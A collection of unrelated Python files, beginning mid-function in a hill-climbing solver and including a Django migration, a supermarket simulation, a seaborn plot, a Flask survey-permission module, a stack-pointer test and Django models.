                        newCost,
                    )
                    self.path.append(actualNode.puzzle)
                # If the remaining lateral movements is 0, return the actual node
                else:
                    return actualNode, self.totalExpansions, actualCost
            # If no frontier node is better than then actual one, finish the Hill Climbing and return the actual node
            else:
                return actualNode, self.totalExpansions, actualCost
            if self.checkNodeSolution(actualNode.puzzle):
                return actualNode, self.totalExpansions, actualCost
            else:
                actualNode.expand()
                self.totalExpansions += 1
                # Clears the frontier to insert the new nodes
                self.frontier.clear()
                self.insertNodeToFrontier(actualNode.up, actualCost)
                self.insertNodeToFrontier(actualNode.down, actualCost)
                self.insertNodeToFrontier(actualNode.left, actualCost)
                self.insertNodeToFrontier(actualNode.right, actualCost)
        # If, for some reason, the solver doesn't found a solution, then return the last actual node as an answer
        return actualNode, self.totalExpansions, actualCost
|
nilq/baby-python
|
python
|
# Generated by Django 3.1.13 on 2021-09-28 03:33
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: redefine `property_area` and
    `property_price` as DecimalField(max_digits=20, decimal_places=2)
    with updated verbose names / help text."""

    dependencies = [
        ('property', '0010_auto_20210928_0430'),
    ]

    operations = [
        migrations.AlterField(
            model_name='property',
            name='property_area',
            field=models.DecimalField(decimal_places=2, default=0.0, max_digits=20, verbose_name='Area Sq/Ft'),
        ),
        migrations.AlterField(
            model_name='property',
            name='property_price',
            field=models.DecimalField(decimal_places=2, default=0.0, help_text='if your price type is sq/ft, then the price cost should be by a unit of the property area square feet and leave the total we will automatically round it up for you by the total area numbers you have ', max_digits=20, verbose_name='Property Price'),
        ),
    ]
|
nilq/baby-python
|
python
|
from supermarket import Supermarket
from Markov import Get_Entry
# Build the Markov-chain entry distribution and open the store
entry = Get_Entry()
lidl = Supermarket(name='LIDL', entry = entry)

# Run the simulation minute by minute until closing time
while lidl.is_open():
    # increase the time of the supermarket by one minute
    # generate new customers at their initial location
    # repeat from step 1
    lidl.add_new_customers()
    lidl.print_customers()
    lidl.next_minute()
    # remove churned customers from the supermarket
    # (method name is misspelled in the Supermarket API and must stay)
    lidl.remove_exitsting_customers()
|
nilq/baby-python
|
python
|
"""
Timeseries plots with error bands
=================================
_thumb: .5, .45
"""
import seaborn as sns

sns.set(style="darkgrid")

# Load the example fMRI dataset in long form
fmri = sns.load_dataset("fmri")

# One line per region, dashed by event, with bootstrap error bands
sns.lineplot(
    x="timepoint",
    y="signal",
    hue="region",
    style="event",
    data=fmri,
)
|
nilq/baby-python
|
python
|
from typing import Literal, Any, List, Dict
from flask_sqlalchemy import SQLAlchemy
from base64 import b32encode
from flask import session
from globals import *
import xml.etree.ElementTree as ET
import sqlite3
import secrets
import random
import error
import re
import os
db = SQLAlchemy(app)

# 'g' is the guest role (User default); 's' is the administrator role
# (see get_user_surveys); 'u' is presumably a regular user — confirm.
Role = Literal['s', 'u', 'g']
# Permission codes; 'r' is the default read grant — 'o'/'w'/'n' are
# presumably owner/write/none, matching PERMISSION_ORDER below.
Permission = Literal['o', 'w', 'r', 'n']
# Permissions ordered from weakest to strongest; compared by index
PERMISSION_ORDER = ['n', 'r', 'w', 'o']
class User(db.Model):
    """Application user mapped to the ``Users`` table."""
    __tablename__ = "Users"
    id = db.Column(db.Integer, primary_key=True)  #: User Id
    CasLogin = db.Column(db.String(80), unique=True, nullable=False)  #: CAS Login
    Pesel = db.Column(db.String(11), nullable=True)  #: PESEL number of the user
    FetchData = db.Column(db.Boolean, nullable=False)  #: No use of this value is implemented yet
    Role = db.Column(db.String, default='g', nullable=False)  #: The user's role in the system ('g' = guest by default)

    def as_dict(self):
        """Serialize the user for API responses (CAS domain stripped)."""
        ud = {
            "id": self.id,
            "casLogin": self.CasLogin.split('@')[0],
            "fetchData": self.FetchData,
            "role": self.Role,
            # any role other than guest counts as logged in
            "logged": self.Role != 'g',
        }
        if DEBUG:
            ud["debug"] = True
        return ud
class Survey(db.Model):
    """Survey mapped to the ``Surveys`` table."""
    __tablename__ = "Surveys"
    id = db.Column(db.Integer, primary_key=True)  #: Survey Id
    Name = db.Column(db.String(80), nullable=False)  #: Title of the survey
    AnkieterId = db.Column(db.Integer, unique=True)  #: Id of the Survey in USOS Ankieter
    StartedOn = db.Column(db.DateTime, nullable=True)  #: Start date of the survey
    EndsOn = db.Column(db.DateTime, nullable=True)  #: End date of the survey
    IsActive = db.Column(db.Integer, nullable=True)  #: No use of this value is implemented yet
    QuestionCount = db.Column(db.Integer, nullable=True)  #: Number of questions in the survey
    BackgroundImg = db.Column(db.String(50), default=None)  #: Filename of the survey's background image in the menu
    AuthorId = db.Column(db.Integer, db.ForeignKey('Users.id'))  #: Id of the user who created the survey
class Report(db.Model):
    """Report (built from a survey) mapped to the ``Reports`` table."""
    __tablename__ = "Reports"
    id = db.Column(db.Integer, primary_key=True)  #: Report Id
    Name = db.Column(db.String(80), nullable=False)  #: Title of the report
    SurveyId = db.Column(db.Integer, db.ForeignKey('Surveys.id'), nullable=False)  #: Id of the source survey
    BackgroundImg = db.Column(db.String(50))  #: Filename of the report's background image in the menu
    AuthorId = db.Column(db.Integer, db.ForeignKey('Users.id'))  #: Id of the user who created the report
class UserGroup(db.Model):
    """Many-to-many membership of a user in a named group."""
    __tablename__ = "UserGroups"
    UserId = db.Column(db.Integer, db.ForeignKey('Users.id'), primary_key=True)  #: Id of the member user
    Group = db.Column(db.String(25), primary_key=True)  #: The name of the group
class SurveyGroup(db.Model):
    """Assignment of a survey to a named group."""
    __tablename__ = "SurveyGroups"
    SurveyId = db.Column(db.Integer, db.ForeignKey('Surveys.id'), primary_key=True)  #: Id of the survey that belongs to a group
    Group = db.Column(db.String(25), primary_key=True)  #: The name of the group
class ReportGroup(db.Model):
    """Assignment of a report to a named group."""
    __tablename__ = "ReportGroups"
    ReportId = db.Column(db.Integer, db.ForeignKey('Reports.id'), primary_key=True)  #: Id of the report that belongs to a group
    Group = db.Column(db.String(25), primary_key=True)  #: The name of the group
class SurveyPermission(db.Model):
    """A user's permission on a survey."""
    __tablename__ = "SurveyPermissions"
    SurveyId = db.Column(db.Integer, db.ForeignKey('Surveys.id'), primary_key=True)  #: The Id of the survey the permission is to
    UserId = db.Column(db.Integer, db.ForeignKey('Users.id'), primary_key=True)  #: The Id of the user that holds the permission
    Type = db.Column(db.String, default='r', nullable=False)  #: The type of the permission ('r' = read by default)
class ReportPermission(db.Model):
    """A user's permission on a report."""
    __tablename__ = "ReportPermissions"
    ReportId = db.Column(db.Integer, db.ForeignKey('Reports.id'), primary_key=True)  #: The Id of the report the permission is to
    UserId = db.Column(db.Integer, db.ForeignKey('Users.id'), primary_key=True)  #: The Id of the user that holds the permission
    Type = db.Column(db.String, default='r', nullable=False)  #: The type of the permission ('r' = read by default)
class Link(db.Model):
    """Shareable permission link; the public token is Salt + id."""
    __tablename__ = "Links"
    id = db.Column(db.Integer, primary_key=True)  #: Link Id
    Salt = db.Column(db.String(SALT_LENGTH))  #: The salt of the link
    PermissionType = db.Column(db.String, default='r', nullable=False)  #: Permission granted by the link
    ObjectType = db.Column(db.String, nullable=False)  #: Type of the object the permission is to ('s' survey / 'r' report)
    ObjectId = db.Column(db.Integer, nullable=False)  #: Id of the object the permission is to
# Expose the User and Survey models in the Flask-Admin panel
ADMIN.add_view(ModelView(User, db.session))
ADMIN.add_view(ModelView(Survey, db.session))
def get_user(login: Any = "") -> User:
    """Get a user object from DB.

    :param login: User's CAS login, id or guest if empty string (default: "")
    :raises error.API: no such user
    :return: User object
    :rtype: User
    """
    user = None
    if not login:
        # instead of raising an error when no login is given,
        # fall back to the session user, defaulting to the guest account
        if 'username' not in session:
            session['username'] = GUEST_NAME
        if session['username'] == GUEST_NAME:
            return User.query.filter_by(Role='g').first()
        login = session['username']
    if type(login) is str:
        if '@' in login:
            # a full CAS login with domain part
            user = User.query.filter_by(CasLogin=login).first()
        elif re.match("[0-9]+", login):
            # all-digit string: treat as a PESEL number
            user = User.query.filter_by(Pesel=login).first()
        else:
            # bare login without domain: linear scan over all users
            users = get_all_users()
            for u in users["users"]:
                if u["casLogin"].split("@")[0] == login:
                    user = User.query.filter_by(id=u["id"]).first()
    if type(login) is int:
        # numeric id lookup
        user = User.query.filter_by(id=login).first()
    if user is None:
        raise error.API(f'no such user {login}')
    return user
def create_user(cas_login: str, pesel: str, role: str) -> User:
    """Create and persist a new user.

    :param cas_login: New user's cas login
    :type cas_login: str
    :param pesel: New user's PESEL number
    :type pesel: str
    :param role: New user's role (values: 's','u','g')
    :type role: Role
    :return: The new user's User object
    :rtype: User
    """
    new_user = User(CasLogin=cas_login, Pesel=pesel, Role=role, FetchData=True)
    db.session.add(new_user)
    db.session.commit()
    return new_user
def delete_user(user: User):
    """Delete *user* together with their survey permissions, report
    permissions and group memberships, then commit.

    :param user: The user to be deleted
    :type user: User
    """
    related = (SurveyPermission.query.filter_by(UserId=user.id).all()
               + ReportPermission.query.filter_by(UserId=user.id).all()
               + UserGroup.query.filter_by(UserId=user.id).all())
    for record in related:
        db.session.delete(record)
    db.session.delete(user)
    db.session.commit()
def get_survey(survey_id: int) -> Survey:
    """Fetch a survey by id.

    :param survey_id: Survey's id
    :type survey_id: int
    :raises error.API: no such survey
    :return: the Survey object
    :rtype: Survey
    """
    found = Survey.query.filter_by(id=survey_id).first()
    if found is None:
        raise error.API('no such survey')
    return found
def get_report(report_id: int) -> Report:
    """Fetch a report by id.

    :param report_id: Id of a report
    :type report_id: int
    :raises error.API: no such report
    :return: the requested Report object
    :rtype: Report
    """
    found = Report.query.filter_by(id=report_id).first()
    if found is None:
        raise error.API('no such report')
    return found
def get_permission_link(permission: Permission, object_type: Literal['s', 'r'], object_id: int) -> str:
    """Create (or reuse) a share link granting *permission* to an object.

    :param permission: Permission type (values: 'o', 'w', 'r', 'n')
    :type permission: Permission
    :param object_type: Type of the object shared by the link ('s' survey, 'r' report)
    :type object_type: Literal['s', 'r']
    :param object_id: Id of the object
    :type object_id: int
    :return: A concatenated salt and link id as a string
    :rtype: str
    """
    link = Link.query.filter_by(PermissionType=permission, ObjectType=object_type, ObjectId=object_id).first()
    if link is not None:
        return link.Salt + str(link.id)
    # 5 random bits per base32 character, then trim to SALT_LENGTH chars
    bits = secrets.randbits(5*SALT_LENGTH)
    salt = bits.to_bytes(5*SALT_LENGTH//8+1, byteorder='big')
    salt = b32encode(salt).decode('utf-8')[:SALT_LENGTH]
    salt = salt.lower()
    # BUG FIX: removed a leftover debug print(salt) that leaked the
    # secret salt to stdout/server logs.
    link = Link(
        Salt=salt,
        PermissionType=permission,
        ObjectType=object_type,
        ObjectId=object_id
    )
    db.session.add(link)
    db.session.commit()
    return link.Salt + str(link.id)
def set_permission_link(tag: str, user: User):
    """Grant the permission carried by a share link to *user*.

    The permission is only written when it is stronger than what the
    user already holds on the target object.

    :param tag: Salt and id string from the link
    :type tag: str
    :param user: User that will gain the permission
    :type user: User
    :return: permission type, object name ('survey'/'report') and object id
    :rtype: Permission, object, int
    """
    link = get_link_details(tag)
    if link is None:
        raise error.API('wrong url')
    kind = link.ObjectType
    if kind == 's':
        object_name = 'survey'
        target = get_survey(link.ObjectId)
        current = get_survey_permission(target, user)
        grant = set_survey_permission
    elif kind == 'r':
        object_name = 'report'
        target = get_report(link.ObjectId)
        current = get_report_permission(target, user)
        grant = set_report_permission
    else:
        raise error.API(f'unknown database object type "{kind}"')
    # upgrade only; an equal or stronger permission is left untouched
    if PERMISSION_ORDER.index(current) < PERMISSION_ORDER.index(link.PermissionType):
        grant(target, user, link.PermissionType, bylink=True)
    return link.PermissionType, object_name, target.id
def get_link_details(tag: str) -> Link:
    """Resolve a share-link token into its Link row.

    :param tag: Salt and id string from the link (salt first, id after)
    :type tag: str
    :return: the matching Link object, or None if none matches
    :rtype: Link
    """
    salt, link_id = tag[:SALT_LENGTH], int(tag[SALT_LENGTH:])
    return Link.query.filter_by(id=link_id, Salt=salt).first()
def get_report_users(report: Report) -> dict:
    """Get users having permission to the given report.

    :param report: The report
    :type report: Report
    :return: dict mapping user ids to their permission type
    :rtype: dict
    """
    permissions = ReportPermission.query.filter_by(ReportId=report.id).all()
    return {perm.UserId: perm.Type for perm in permissions}
def get_survey_users(survey: Survey) -> dict:
    """Get users having permission to the given survey.

    :param survey: The survey
    :type survey: Survey
    :return: dict mapping user ids to their permission type
    :rtype: dict
    """
    permissions = SurveyPermission.query.filter_by(SurveyId=survey.id).all()
    return {perm.UserId: perm.Type for perm in permissions}
def get_all_users() -> dict:
    """Get all users.

    :return: dict with a "users" list of {casLogin, id} entries
     (CAS domain part stripped from the login)
    :rtype: dict
    """
    entries = [
        {"casLogin": u.CasLogin.split('@')[0], "id": u.id}
        for u in User.query.all()
    ]
    return {"users": entries}
def get_groups() -> List[str]:
    """Get all distinct group names from UserGroups.

    :return: List of all groups
    :rtype: List[str]
    """
    rows = UserGroup.query.with_entities(UserGroup.Group).distinct()
    return [row.Group for row in rows]
def set_user_group(user: User, group_name: str):
    """Add *user* to a group; do nothing if the membership already exists.

    :param user: User
    :type user: User
    :param group_name: Name of a group
    :type group_name: str
    """
    existing = UserGroup.query.filter_by(UserId=user.id, Group=group_name).first()
    if existing is not None:
        return
    db.session.add(UserGroup(UserId=user.id, Group=group_name))
    db.session.commit()
def unset_user_group(user: User, group: str):
    """Remove *user* from a group.

    :param user: User object
    :type user: User
    :param group: Group name
    :type group: str
    :raises error.API: the user is not in the group
    """
    membership = UserGroup.query.filter_by(UserId=user.id, Group=group)
    # BUG FIX: the original compared the Query object itself against None,
    # which is never true, so the "not in the group" error was unreachable.
    if membership.first() is None:
        raise error.API('the user is not in the group')
    membership.delete()
    db.session.commit()
def get_user_groups(user: User) -> List[str]:
    """Get all group names the given user belongs to.

    :param user: Given user
    :type user: User
    :return: List of user's groups names
    :rtype: List
    """
    memberships = UserGroup.query.filter_by(UserId=user.id).all()
    if memberships is None:
        return []
    return [membership.Group for membership in memberships]
def get_user_surveys(user: User) -> List[Survey]:
    """Get surveys for which the user has permissions.
    Administrators (role 's') get all surveys.

    :param user: User object
    :type user: User
    :return: List of Survey objects
    :rtype: List[Survey]
    """
    if user.Role == 's':
        return Survey.query.all()
    surveys = [
        Survey.query.filter_by(id=perm.SurveyId).first()
        for perm in SurveyPermission.query.filter_by(UserId=user.id).all()
    ]
    # surveys granted through links are kept in the session
    for survey_id in session.get('surveys', []):
        surveys.append(Survey.query.filter_by(id=int(survey_id)).first())
    return surveys
def get_user_reports(user: User) -> List[Report]:
    """Get reports for which the user has permissions.

    Administrators receive every report; other users get the reports they
    hold explicit permissions for, plus any granted in their session.

    :param user: User object
    :type user: User
    :return: List of Report objects
    :rtype: List[Report]
    """
    if user.Role == 's':
        return Report.query.all()
    permissions = ReportPermission.query.filter_by(UserId=user.id).all()
    reports = [Report.query.filter_by(id=p.ReportId).first() for p in permissions]
    # Session-granted (link-shared) reports are keyed by report id.
    for report_id in session.get('reports', []):
        reports.append(Report.query.filter_by(id=int(report_id)).first())
    return reports
def get_group_users(group: str) -> List[User]:
    """Get users assigned to the given group.

    :param group: Name of a group
    :type group: str
    :return: List of User objects
    :rtype: List[User]
    """
    memberships = UserGroup.query.filter_by(Group=group).all()
    # Look each member up and drop dangling memberships (deleted users).
    found = (User.query.filter_by(id=m.UserId).first() for m in memberships)
    return [user for user in found if user is not None]
def rename_report(report: Report, name: str):
    """Rename a report and commit the change immediately.

    :param report: The Report object
    :type report: Report
    :param name: New report name
    :type name: str
    """
    report.Name = name
    db.session.commit()
def rename_survey(survey: Survey, name: str):
    """Rename a survey and commit the change immediately.

    :param survey: The Survey object
    :type survey: Survey
    :param name: New survey name
    :type name: str
    """
    survey.Name = name
    db.session.commit()
def delete_group(group: str):
    """Delete a group by removing all of its membership rows.

    The users themselves are untouched; only the UserGroup links vanish.

    :param group: The name of the group
    :type group: str
    """
    UserGroup.query.filter_by(Group=group).delete()
    db.session.commit()
def create_survey(user: User, name: str) -> Survey:
    """Create a new survey owned by the given user.

    The creator automatically receives owner ('o') permission.

    :param user: The creator of the new survey
    :type user: User
    :param name: Name of a survey
    :type name: str
    :return: The object of the new survey
    :rtype: Survey
    """
    # Pick a random background image from the bundled 'bkg' directory.
    background = random.choice(os.listdir(path.join(ABSOLUTE_DIR_PATH, 'bkg')))
    survey = Survey(
        Name=name,
        QuestionCount=0,
        AuthorId=user.id,
        BackgroundImg=background,
    )
    db.session.add(survey)
    db.session.commit()
    set_survey_permission(survey, user, 'o')
    return survey
# meta = {"started_on": DateTime, "ends_on": DateTime, "is_active": int}
def set_survey_meta(survey: Survey, name: str, question_count: int, meta: dict):
    """Add meta information to a survey, creating it if it does not exist.

    :param survey: The survey to be modified (may be None to create one)
    :type survey: Survey
    :param name: The new name of a survey
    :type name: str
    :param question_count: Number of questions
    :type question_count: int
    :param meta: Other information (started_on, ends_on, is_active)
    :type meta: dict
    :return: True on success
    :rtype: bool
    """
    if survey is None:
        survey = Survey(Name=name, QuestionCount=question_count)
        db.session.add(survey)
    if name:
        survey.Name = name
    # Robustness fix: use dict.get() so a partial meta dict (e.g. one missing
    # "ends_on") no longer raises KeyError; absent/falsy keys are skipped.
    if meta.get("started_on"):
        survey.StartedOn = meta["started_on"]
    if meta.get("ends_on"):
        survey.EndsOn = meta["ends_on"]
    if meta.get("is_active"):
        survey.IsActive = meta["is_active"]
    if survey.BackgroundImg is None:
        # Assign a random background if the survey does not have one yet.
        bkgs = os.listdir(path.join(ABSOLUTE_DIR_PATH, 'bkg'))
        survey.BackgroundImg = random.choice(bkgs)
    db.session.commit()
    print("Survey meta data added")
    return True
def get_survey_permission(survey: Survey, user: User) -> Permission:
    """Get the permission of the given user for a survey.

    Session-stored (link-shared) permissions take precedence over the
    database; administrators fall back to the admin default.

    :param survey: The survey
    :type survey: Survey
    :param user: The user whose permissions are to be checked
    :type user: User
    :return: The user's permissions for the survey
    :rtype: Permission
    """
    key = str(survey.id)
    session_perms = session.get('surveys', {})
    if key in session_perms:
        return session_perms[key]
    sp = SurveyPermission.query.filter_by(SurveyId=survey.id, UserId=user.id).first()
    if sp is not None:
        return sp.Type
    return ADMIN_DEFAULT_PERMISSION if user.Role == 's' else 'n'
def set_survey_permission(survey: Survey, user: User, permission: Permission, bylink=False):
    """Set the permission of the given user for a survey.

    :param survey: The survey
    :type survey: Survey
    :param user: The user whose permissions are to be set
    :type user: User
    :param permission: The user's permissions for the survey
    :type permission: Permission
    :param bylink: Is the permission set because of a link? (default: False)
    :type bylink: bool
    """
    # If the permission is granted via a share link and the user is a guest,
    # store it only in their session rather than in the database.
    if bylink and user.Role == 'g':
        if 'surveys' not in session:
            session['surveys'] = {}
        if PERMISSION_ORDER.index(permission) >= PERMISSION_ORDER.index('r'):
            # CONSISTENCY FIX: get_survey_permission() looks the entry up under
            # str(survey.id); the original stored it under the int id, so a
            # freshly granted permission could be missed within the same
            # request (Flask only stringifies keys on JSON serialization).
            session['surveys'][str(survey.id)] = 'r'
        return
    sp = SurveyPermission.query.filter_by(SurveyId=survey.id, UserId=user.id).first()
    if sp is None:
        sp = SurveyPermission(SurveyId=survey.id, UserId=user.id)
        db.session.add(sp)
    if permission != "n":
        sp.Type = permission
    else:
        # Permission 'n' (none) removes the row entirely.
        db.session.delete(sp)
    db.session.commit()
def get_report_survey(report: Report) -> Survey:
    """Get the survey a report was generated from.

    :param report: Report object
    :type report: Report
    :return: The source survey of the report
    :rtype: Survey
    :raises error.API: if the report is None
    """
    if report is None:
        raise error.API('no such report')
    return Survey.query.filter_by(id=report.SurveyId).first()
def get_report_permission(report: Report, user: User) -> Permission:
    """Get the permission of the given user for a report.

    Session-stored (link-shared) permissions take precedence over the
    database; administrators fall back to the admin default.

    :param report: The report
    :type report: Report
    :param user: The user whose permissions are to be checked
    :type user: User
    :return: The user's permissions for the report
    :rtype: Permission
    """
    key = str(report.id)
    session_perms = session.get('reports', {})
    if key in session_perms:
        return session_perms[key]
    rp = ReportPermission.query.filter_by(ReportId=report.id, UserId=user.id).first()
    if rp is not None:
        return rp.Type
    return ADMIN_DEFAULT_PERMISSION if user.Role == 's' else 'n'
def set_report_permission(report: Report, user: User, permission: Permission, bylink=False):
    """Set the permission of the given user for a report.

    :param report: The report
    :type report: Report
    :param user: The user whose permissions are to be set
    :type user: User
    :param permission: The user's permissions for the report
    :type permission: Permission
    :param bylink: Is the permission set because of a link? (default: False)
    :type bylink: bool
    """
    # If the permission is granted via a share link and the user is a guest,
    # store it only in their session rather than in the database.
    if bylink and user.Role == 'g':
        if 'reports' not in session:
            session['reports'] = {}
        if PERMISSION_ORDER.index(permission) >= PERMISSION_ORDER.index('r'):
            # CONSISTENCY FIX: get_report_permission() looks the entry up under
            # str(report.id); the original stored it under the int id, so a
            # freshly granted permission could be missed within the same
            # request (Flask only stringifies keys on JSON serialization).
            session['reports'][str(report.id)] = 'r'
        return
    rp = ReportPermission.query.filter_by(ReportId=report.id, UserId=user.id).first()
    if rp is None:
        rp = ReportPermission(ReportId=report.id, UserId=user.id)
        db.session.add(rp)
    if permission != "n":
        rp.Type = permission
    else:
        # Permission 'n' (none) removes the row entirely.
        db.session.delete(rp)
    db.session.commit()
def create_report(user: User, survey: Survey, name: str, author: int) -> Report:
    """Create a report from a survey for the given user.

    The report inherits the survey's background image, and *user* receives
    owner ('o') permission on it.

    :param user: The creator of the report
    :type user: User
    :param survey: The source survey of the report
    :type survey: Survey
    :param name: The name of the new report
    :type name: str
    :param author: The database id of the creator
    :type author: int
    :return: The newly created report
    :rtype: Report
    """
    source = Survey.query.filter_by(id=survey.id).first()
    report = Report(
        Name=name,
        SurveyId=survey.id,
        AuthorId=author,
        BackgroundImg=source.BackgroundImg,
    )
    db.session.add(report)
    db.session.commit()
    set_report_permission(report, user, 'o')
    return report
def delete_survey(survey: Survey):
    """Delete a survey together with its permission and group links.

    The survey's on-disk .db/.xml files are intentionally left in place.

    :param survey: The survey to be deleted
    :type survey: Survey
    """
    # Remove dependent rows first, then the survey row itself.
    for model in (SurveyPermission, SurveyGroup):
        model.query.filter_by(SurveyId=survey.id).delete()
    Survey.query.filter_by(id=survey.id).delete()
    db.session.commit()
def delete_report(report: Report):
    """Delete a report together with its permission and group links.

    :param report: The report to be deleted
    :type report: Report
    """
    # Remove dependent rows first, then the report row itself.
    for model in (ReportPermission, ReportGroup):
        model.query.filter_by(ReportId=report.id).delete()
    Report.query.filter_by(id=report.id).delete()
    db.session.commit()
def open_survey(survey: Survey) -> sqlite3.Connection:
    """Open an SQLite3 connection to the survey's answer database.

    The database file lives under ``data/`` and is named after the
    survey's numeric id.

    :param survey: The survey
    :type survey: Survey
    :return: A connection to the DB of the survey
    :rtype: sqlite3.Connection
    """
    # NOTE(review): the path is relative to the process working directory —
    # confirm the app always runs from the project root.
    return sqlite3.connect(f"data/{survey.id}.db")
def get_answers(survey_id: int) -> Dict:
    """Parse a survey's XML definition and collect questions and answers.

    :param survey_id: Id of the survey
    :type survey_id: int
    :return: Mapping of question header to its metadata
        ("question", "type", "sub_questions", "values")
    :rtype: Dict
    """
    xml = ET.parse(os.path.join(ABSOLUTE_DIR_PATH, f"survey/{survey_id}.xml"))
    result = {}
    questions = ['single', 'multi', 'groupedsingle']
    for q in questions:
        for b in xml.getroot().iter(q):
            header = b.find('header').text
            # FIX: raw string for the regex — '\w' in a non-raw literal is an
            # invalid escape sequence (DeprecationWarning, SyntaxError in
            # future Python). The pattern strips HTML tags from the header.
            header = re.sub(r'</?\w[^>]*>', '', header).strip(' \n')
            if header not in result:
                result[header] = {}
                result[header]["question"] = header
                result[header]["type"] = q
                result[header]["sub_questions"] = []
                result[header]["values"] = {}
                if 'defaultValue' in b.attrib:
                    result[header]["values"][b.attrib['defaultValue']] = "default"
            if q == 'groupedsingle':
                for item in b.find('items'):
                    result[header]["sub_questions"].append(item.attrib['value'].strip(' '))
            if q != "multi":
                for item in b.find('answers'):
                    result[header]["values"][item.attrib['code']] = item.attrib['value'].strip(' ')
            else:
                # Multi-choice answers become sub-questions with yes/no values.
                for item in b.find('answers'):
                    result[header]["sub_questions"].append(item.attrib['value'].strip(' '))
                result[header]["values"]["0"] = "NIE"
                result[header]["values"]["1"] = "TAK"
    return result
def get_dashboard() -> Dict:
    """Collect the current user's surveys and reports for the dashboard.

    :return: Dictionary with an "objects" key listing surveys and reports
    :rtype: Dict
    """
    user = get_user()
    user_surveys = get_user_surveys(user)
    result = []
    for survey in user_surveys:
        author = get_user(survey.AuthorId)
        result.append({
            'type': 'survey',
            'endsOn': survey.EndsOn.timestamp() if survey.EndsOn is not None else None,
            'startedOn': survey.StartedOn.timestamp() if survey.StartedOn is not None else None,
            'id': survey.id,
            'name': survey.Name,
            'sharedTo': get_survey_users(survey),
            'ankieterId': survey.AnkieterId,
            'isActive': survey.IsActive,
            'questionCount': survey.QuestionCount,
            'backgroundImg': survey.BackgroundImg,
            'userId': user.id,
            'answersCount': get_answers_count(survey),
            'authorId': author.id,
            'authorName': author.CasLogin
        })
    user_reports = get_user_reports(user)
    for report in user_reports:
        try:
            survey = get_survey(report.SurveyId)
        except Exception:
            # FIX: was a bare "except:", which also swallowed SystemExit and
            # KeyboardInterrupt. Skip reports whose source survey is missing.
            continue
        author = get_user(report.AuthorId)
        result.append({
            'type': 'report',
            'id': report.id,
            'name': report.Name,
            'sharedTo': get_report_users(report),
            'connectedSurvey': {"id": report.SurveyId, "name": survey.Name},
            'backgroundImg': report.BackgroundImg,
            'userId': user.id,
            'authorId': author.id,
            'authorName': author.CasLogin
        })
    return {"objects": result}
def get_types(conn: sqlite3.Connection) -> Dict[str, str]:
    """Map each column of the 'data' table to its declared SQL type.

    :param conn: Connection to the database
    :type conn: sqlite3.Connection
    :return: A dictionary mapping names of columns to SQL names of their types
    :rtype: Dict[str, str]
    """
    cur = conn.cursor()
    cur.execute("PRAGMA table_info(data)")
    # PRAGMA table_info rows are (cid, name, type, notnull, dflt_value, pk).
    return {row[1]: row[2] for row in cur.fetchall()}
def get_columns(conn: sqlite3.Connection) -> List[str]:
    """Get column names in the order the database returns them.

    :param conn: Connection to the database
    :type conn: sqlite3.Connection
    :return: A list of column names in the database
    :rtype: List[str]
    """
    cur = conn.cursor()
    cur.execute("PRAGMA table_info(data)")
    # Column name is field 1 of each PRAGMA table_info row.
    return [row[1] for row in cur.fetchall()]
def get_answers_count(survey: Survey) -> int:
    """Return the number of answer rows stored for the given survey.

    :param survey: The survey
    :type survey: Survey
    :return: The number of answers (0 if the data table does not exist)
    :rtype: int
    """
    conn = open_survey(survey)
    try:
        cur = conn.cursor()
        # PERF FIX: let SQLite count the rows instead of transferring every
        # row to Python just to take len() of the result.
        cur.execute("SELECT COUNT(*) FROM data")
        return cur.fetchone()[0]
    except sqlite3.Error:
        # Narrowed from a bare except: only database errors (e.g. missing
        # 'data' table before any answers arrive) mean "no answers".
        return 0
    finally:
        # Guarantee the connection is closed on every path.
        conn.close()
|
nilq/baby-python
|
python
|
import bitwise as bw
class TestStackPointer:
    """Exercises the StackPointer counter: hold, count down, count up."""

    def test_StackPointer(self):
        up = bw.wire.Wire()
        down = bw.wire.Wire()
        clock = bw.wire.Wire()
        output_bus = bw.wire.Bus16()
        sp = bw.processor.StackPointer(up, down, clock, output_bus)

        def tick():
            # One full clock cycle: falling edge then rising edge.
            clock.value = 0
            clock.value = 1

        def bits(pattern):
            # "10…" -> (1, 0, …): expected 16-bit bus state.
            return tuple(int(ch) for ch in pattern)

        # Neither up nor down asserted: holds the reset value.
        tick()
        assert output_bus.wire_values == bits("0000000000000000")

        # Counting down wraps from 0 to all-ones, then decrements.
        down.value = 1
        tick()
        assert output_bus.wire_values == bits("1111111111111111")
        tick()
        assert output_bus.wire_values == bits("1111111111111110")
        tick()
        assert output_bus.wire_values == bits("1111111111111101")
        tick()
        assert output_bus.wire_values == bits("1111111111111100")

        # With down deasserted the value holds across clock cycles.
        down.value = 0
        tick()
        assert output_bus.wire_values == bits("1111111111111100")
        tick()
        assert output_bus.wire_values == bits("1111111111111100")
        tick()
        assert output_bus.wire_values == bits("1111111111111100")

        # Counting up increments once per clock cycle.
        up.value = 1
        tick()
        assert output_bus.wire_values == bits("1111111111111101")
        tick()
        assert output_bus.wire_values == bits("1111111111111110")

        # With both up and down asserted, down wins.
        down.value = 1
        tick()
        assert output_bus.wire_values == bits("1111111111111101")

        print(sp.__doc__)
        print(sp)

        # Rewire via the call interface, then pulse the clock once more.
        sp(
            up=0,
            down=1,
            clock=0,
            output_bus=None
        )
        sp(clock=1)
        assert output_bus.wire_values == bits("1111111111111100")
|
nilq/baby-python
|
python
|
from django.db import models
class Suggestion(models.Model):
    """A user-submitted suggestion, identified by its unique name."""
    name = models.CharField(max_length=100, unique=True)
class ImageTag(models.Model):
    """A tag attached to an image belonging to a game."""
    game = models.CharField(max_length=100)
    image = models.CharField(max_length=50)
    tag = models.CharField(max_length=200)
class Favorite(models.Model):
    """Marks an item (by slug) as a favorite of a user."""
    user = models.ForeignKey('authentication.CustomUser', on_delete=models.CASCADE)
    slug = models.CharField(max_length=100)
    class Meta:
        # A user may favorite a given slug at most once.
        unique_together = ('user', 'slug')
class Cover(models.Model):
    """A cover image for a game, with a tag and a size value."""
    game = models.CharField(max_length=100)
    image = models.CharField(max_length=50)
    tag = models.CharField(max_length=200)
    # NOTE(review): unit of 'size' (pixels? bytes?) is not evident here —
    # confirm against the code that populates this model.
    size = models.IntegerField()
|
nilq/baby-python
|
python
|
"""
byceps.blueprints.site.core.views
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2021 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from __future__ import annotations
from typing import Optional
from flask import g, url_for
from .... import config
from ....services.party import service as party_service
from ....services.site import service as site_service
from ....util.framework.blueprint import create_blueprint
